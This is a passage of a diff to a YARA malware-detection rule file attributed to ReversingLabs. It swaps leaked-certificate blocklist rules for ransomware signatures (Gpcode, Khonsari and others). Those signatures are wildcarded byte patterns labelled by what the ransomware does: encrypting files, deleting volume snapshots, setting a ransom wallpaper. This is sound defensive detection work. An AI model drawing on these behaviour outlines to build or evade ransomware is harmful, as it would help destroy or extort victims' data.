50 FF 15 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 8D 44 24 - ?? 74 ?? 90 83 C0 ?? 66 83 38 ?? 75 ?? 8D 4C 24 ?? BA ?? ?? ?? ?? 2B C1 D1 F8 8D 04 - 45 ?? ?? ?? ?? 50 8B C1 8D 8C 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? - ?? ?? ?? 50 FF D7 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 6A ?? 6A ?? 6A ?? - 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 74 24 - ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 7B ?? 8B 5B ?? C7 44 24 ?? ?? ?? ?? ?? 85 DB 75 ?? - 81 FF ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 8C 84 ?? ?? ?? ?? 8B D1 C1 EA ?? 33 D1 69 - CA ?? ?? ?? ?? 03 C8 89 8C 84 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? BA ?? ?? ?? ?? 8D - B4 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 75 ?? - 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 8C 94 ?? ?? ?? ?? 8B C1 - C1 E8 ?? 42 33 C8 89 94 24 ?? ?? ?? ?? 8B C1 25 ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 25 - ?? ?? ?? ?? C1 E0 ?? 33 C8 8B C1 C1 E8 ?? 33 C1 89 06 83 C6 ?? 8D 84 24 ?? ?? ?? ?? - 3B F0 72 ?? 8B 74 24 ?? 8D 44 24 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 - 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? 3D ?? ?? ?? ?? 75 ?? 2B F8 83 DB ?? E9 - ?? ?? ?? ?? 8B C7 0B C3 74 ?? 57 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 - 24 ?? 6A ?? 50 57 8D 84 24 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? - 5F 5E 33 C0 5B 8B E5 5D C2 + $find_files_p2 = { + 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB + ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 9F ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF + 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 + ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 + ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? + ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? + ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D + 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3A C1 75 ?? 01 8F ?? ?? ?? ?? 11 + B7 ?? ?? ?? ?? EB ?? 01 8F ?? ?? ?? ?? 11 B7 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 8B 4D ?? 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 + ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68 + ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 89 85 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4D + ?? 8B 55 ?? 51 52 E8 ?? ?? ?? ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 53 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 51 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 33 F6 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ?? + 46 83 FE ?? 7C ?? 8D 55 ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? + ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 6A ?? 51 + } + $encrypt_files_p2 = { + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 95 + ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 56 + FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 85 ?? + ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? + ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? + 8B 3D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50 + 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 + 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D + 95 ?? ?? ?? ?? 52 56 FF D7 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ?? + ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 8B 9D + ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 D2 52 52 52 33 C9 51 50 + FF 15 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B C6 8D + } + $encrypt_files_p3 = { + 48 ?? 8B FF 66 8B 10 83 C0 ?? 66 85 D2 75 ?? 2B C1 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51 + 8D 14 00 8B 83 ?? ?? ?? ?? 52 56 50 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? + 51 6A ?? 68 ?? ?? ?? ?? 52 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? + 8D 4D ?? 51 52 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? + ?? 51 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 + 51 FF D7 8B B5 ?? ?? ?? ?? 6A ?? 33 C9 51 51 B8 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? + 85 C0 74 ?? 33 DB EB ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? + 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? + ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95 + ?? ?? ?? ?? 83 C4 ?? 52 FF 15 ?? ?? ?? ?? 33 C9 51 51 33 C0 51 50 8B 83 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 56 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B + 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + } + $delete_volumes_snapshots_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 33 FF 57 57 89 + 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 57 68 ?? + ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF + D6 57 57 8D 8D ?? ?? ?? ?? 51 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? + 6A ?? 57 57 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F + 84 ?? ?? ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? + ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 33 FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D 9B ?? ?? ?? ?? 8A 08 40 84 + C9 75 ?? 2B C2 57 8D 95 ?? ?? ?? ?? 52 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? + ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 88 0E E8 ?? ?? ?? ?? 8D B5 ?? ?? + ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? + ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? + ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF + 15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B C7 8B FF 66 8B 10 66 3B 11 75 ?? + 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 + } + $delete_volumes_snapshots_p2 = { + EB ?? 1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85 + ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? EB ?? 8D 64 24 ?? 8B BD ?? ?? ?? ?? BA ?? ?? ?? ?? 8B + CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A + ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? + 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 9F ?? + ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 + C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? + ?? ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 33 + FF 57 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 + ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? + ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 89 B5 ?? + ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? + ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83 FE ?? 0F 8C ?? ?? ?? ?? EB ?? 57 + 8D 9F ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B + 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 } condition: - uint16(0)==0x5A4D and ($enumerate_physical_drives and $corrupt_drive_thread) + uint16(0)==0x5A4D and ( all of ($delete_volumes_snapshots_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_05E2E6A4Cd09Ea54D665B075Fe22A256 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Gpcode : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Gpcode ransomware." author = "ReversingLabs" - id = "824c6b2f-081a-5f38-b949-d802f59e6ced" - date = "2023-11-08" - modified = "2023-11-08" + id = "168833dd-44ab-59e1-a610-b9219b2907ff" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L27-L43" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "43da21d9c7ae9bfcc7fe4ee69f9d46cbce1954785d56c1d424b36deb8afe592e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Gpcode.yara#L1-L67" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "329309873977f73a8ebe758018ebc8ba42e15c3c7cbb9a65865631d235f5bb48" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "GPCode" + tc_detection_factor = 5 importance = 25 + strings: + $drive_loop = { + B9 19 00 00 00 BB 01 00 00 00 D3 E3 23 D8 74 ?? 80 + C1 ?? 88 0D ?? ?? ?? ?? 80 E9 ?? C7 05 ?? ?? ?? ?? + ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 59 58 49 7D + } + $encrypt_routine = { + FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? [0-10] + E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ?? FF 35 ?? ?? + ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? + ?? ?? ?? 68 ?? ?? ?? ?? [1-10] FF 35 ?? ?? ?? ?? + 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15) + ?? ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ?? + [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? + 75 ?? [10-40] FF 35 ?? ?? ?? ?? FF 75 ?? E8 + } + $set_ransom_wallpaper = { + 0F B6 05 ?? ?? ?? ?? 83 F8 01 0F 85 ?? ?? ?? ?? + B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 [2-20] 5F + 59 25 ?? ?? ?? ?? C1 E8 ?? 83 C0 ?? AA E2 ?? 33 + C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 68 ?? ?? ?? ?? (E8 | FF 15) + } + $read_config_file = { + 55 8B EC 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A + ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? + ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 50 6A ?? + E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? FF + 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 + 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 + 89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 + 33 C0 C9 C3 89 45 ?? 8B D8 FF 75 ?? FF 75 ?? FF 75 + ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ?? + 6A ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C3 ?? 8B + 45 ?? 83 E8 ?? 50 53 E8 ?? ?? ?? ?? 8A 03 A2 ?? ?? + ?? ?? 83 C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "*.google.com" and pe.signatures[i].serial=="05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56" and 1308182400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($drive_loop and $encrypt_routine and $set_ransom_wallpaper and $read_config_file) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_77019A082385E4B73F569569C9F87Bb8 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Khonsari : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Khonsari ransomware." author = "ReversingLabs" - id = "4046a31b-d7c8-5c63-b5b2-2179b0817b03" - date = "2023-11-08" - modified = "2023-11-08" + id = "c3c64256-af1f-5a9d-8a59-8d72993bb8da" + date = "2022-01-27" + modified = "2022-01-27" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L45-L61" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8613986005bdd30d92e633fa2058be5c43f1c530b9dc6d80ec953f12f6d66ce7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Khonsari.yara#L1-L68" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f1003b7863215bcd8e5cdce8ce40551105fb668ea2b8ac765909f9fa5373e6ca" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Khonsari" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? + 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 0B + 16 0C 2B ?? 07 08 9A 0D 09 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? + ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 09 + 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 06 1B 28 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 06 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 + ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 06 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 2D ?? 00 11 + ?? 7E ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 72 ?? + ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F + ?? ?? ?? ?? DC DE ?? 26 DE ?? 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE 16 ?? + ?? ?? ?? 6F ?? ?? ?? ?? DC 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? + 28 ?? ?? ?? ?? 26 2A + } + $get_key = { + 73 ?? ?? ?? ?? 0A 06 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 + ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D + ?? ?? ?? ?? 12 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? + ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 07 6F ?? + ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 + ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 17 6F ?? + ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A + } + $encrypt_files = { + 28 ?? ?? ?? ?? 0A 06 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 6F ?? ?? ?? ?? 06 20 + ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 6F ?? ?? + ?? ?? 06 19 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 02 7B ?? ?? ?? ?? 6F + ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 02 03 07 28 ?? ?? + ?? ?? 0C DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 08 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AND LLC" and pe.signatures[i].serial=="77:01:9a:08:23:85:e4:b7:3f:56:95:69:c9:f8:7b:b8" and 1308182400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($get_key) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4F2Ef29Ca5F96E5777B82C62F34Fd3A6 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Koxic : TC_DETECTION MALICIOUS 